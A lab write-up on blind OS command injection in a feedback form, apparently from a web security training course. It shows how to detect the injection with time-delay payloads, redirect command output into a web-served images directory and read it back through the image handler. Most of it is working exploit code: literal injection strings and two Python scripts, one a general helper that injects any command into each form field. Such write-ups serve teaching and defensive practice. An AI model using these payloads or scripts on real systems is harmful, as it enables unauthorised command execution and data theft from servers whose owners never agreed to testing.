3. Blind OS command injection with output redirection
Let's open the vulnerable lab:

Move around:



We have this POST request and its parameters; let's test each of them with a time-delay payload to see whether we have blind command injection:
||sleep+5||
The response is delayed by roughly 5 seconds when the payload is placed in the email parameter, so that parameter is vulnerable. Since the injection is blind, let's redirect the output of whoami into the directory mentioned in the lab objective:
||whoami+>+/var/www/images/whoami.txt||
Let's go back and enumerate the website to find where that directory is served from.
Let's try opening one of the images in a new tab:


The image handler appears to fetch photos by filename from the same directory we redirected the whoami output to, so let's request whoami.txt through it:

As we can see we retrieved the output.
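The steps above (time-based detection, output redirection, retrieval via the image handler) generalised into reusable helpers. This is an added example, not the lab's own code or the script below: it assumes the lab's feedback form fields and endpoints (feedback, feedback/submit, image?filename=...) and takes the base URL as an argument. Sending the form as a dict lets requests do the URL encoding, so the shell command can be written with plain spaces instead of hand-encoded `+` signs.

```python
import re
import sys
import time
from urllib.parse import urljoin

import requests

# Assumed form layout: the fields of the lab's feedback form with harmless filler values.
FORM_FIELDS = {"name": "test", "email": "test@test.com", "subject": "test", "message": "test"}
DELAY = 5  # seconds the injected sleep should add to the response time


def build_payload(cmd: str, base: str = "") -> str:
    """Append '||cmd||' to a field value so cmd runs whatever the preceding command returns."""
    return f"{base}||{cmd}||"


def is_delayed(baseline: float, elapsed: float, delay: float = DELAY, tolerance: float = 1.0) -> bool:
    """True when a response took roughly `delay` seconds longer than the baseline request."""
    return (elapsed - baseline) >= (delay - tolerance)


def get_csrf(session: requests.Session, url: str) -> str:
    """Read the CSRF token out of the feedback form; fail loudly if it is missing."""
    html = session.get(urljoin(url, "feedback")).text
    match = re.search(r'name="csrf" value="(.+?)"', html)
    if not match:
        raise RuntimeError("CSRF token not found in feedback form")
    return match.group(1)


def timed_post(session: requests.Session, url: str, data: dict) -> float:
    """Submit the feedback form and return how long the request took."""
    start = time.monotonic()
    session.post(urljoin(url, "feedback/submit"), data=data)
    return time.monotonic() - start


def find_injectable_params(session: requests.Session, url: str, delay: int = DELAY) -> list:
    """Inject 'sleep <delay>' into each form field in turn; return the fields that slow the response."""
    base = dict(FORM_FIELDS, csrf=get_csrf(session, url))
    baseline = timed_post(session, url, base)
    hits = []
    for field, filler in FORM_FIELDS.items():
        data = dict(base)
        data[field] = build_payload(f"sleep {delay}", filler)
        if is_delayed(baseline, timed_post(session, url, data), delay):
            hits.append(field)
    return hits


def exfiltrate(session: requests.Session, url: str, field: str, cmd: str, filename: str) -> str:
    """Redirect cmd's output into the web-served images directory and read it back via /image."""
    data = dict(FORM_FIELDS, csrf=get_csrf(session, url))
    data[field] = build_payload(f"{cmd} > /var/www/images/{filename}", FORM_FIELDS[field])
    session.post(urljoin(url, "feedback/submit"), data=data)
    return session.get(urljoin(url, "image"), params={"filename": filename}).text


if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: python {sys.argv[0]} https://<lab-host>/")
        sys.exit(1)
    target = sys.argv[1]
    with requests.Session() as s:
        vulnerable = find_injectable_params(s, target)
        print(f"[*] Injectable fields: {vulnerable}")
        for f in vulnerable:
            print(f"[*] whoami via {f}: {exfiltrate(s, target, f, 'whoami', 'whoami.txt').strip()}")
```

The tolerance in is_delayed absorbs normal network jitter; if the lab instance is slow, repeat the timing run rather than lowering the tolerance, since a single noisy baseline is the usual cause of a false positive here.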
Solve it using a Python 3 script:

```python
import os
import re
import sys

import requests

# Optional Burp proxy. Pass proxies=proxies to the requests calls below to
# inspect the traffic; it is left unused so the script also runs without Burp.
proxies = {
    "http": "http://127.0.0.1:8080",
    "https": "http://127.0.0.1:8080"
}
session = requests.session()


def CommandInjection():
    print("[*] Get CSRF Token.")
    csrf = re.findall(r'name="csrf" value="(.+?)"', session.get(url=url + "feedback").text)
    if not csrf:
        print("[-] CSRF token not found in the feedback form.")
        sys.exit(1)
    print("[*] Perform Command Injection.")
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    # The email field is the injectable one: '||' runs whoami regardless of the
    # preceding command's result, and the output is redirected into the
    # directory that the /image endpoint serves files from.
    data = f"csrf={csrf[0]}&name=test&email=test@test.com||whoami+>+/var/www/images/whoami.txt||&subject=test&message=test"
    session.post(url=url + "feedback/submit", headers=headers, data=data)
    # Read the redirected output back through the image handler.
    print(session.get(url=url + "image?filename=whoami.txt").text)


if __name__ == "__main__":
    if len(sys.argv) != 2:
        script_name = os.path.basename(__file__)
        print(f"[-] Usage: python {script_name} http://localhost/")
        sys.exit(1)
    # The endpoints are appended directly, so make sure the base URL ends with a slash.
    url = sys.argv[1].rstrip("/") + "/"
    CommandInjection()
    print("[+] Solved.")
```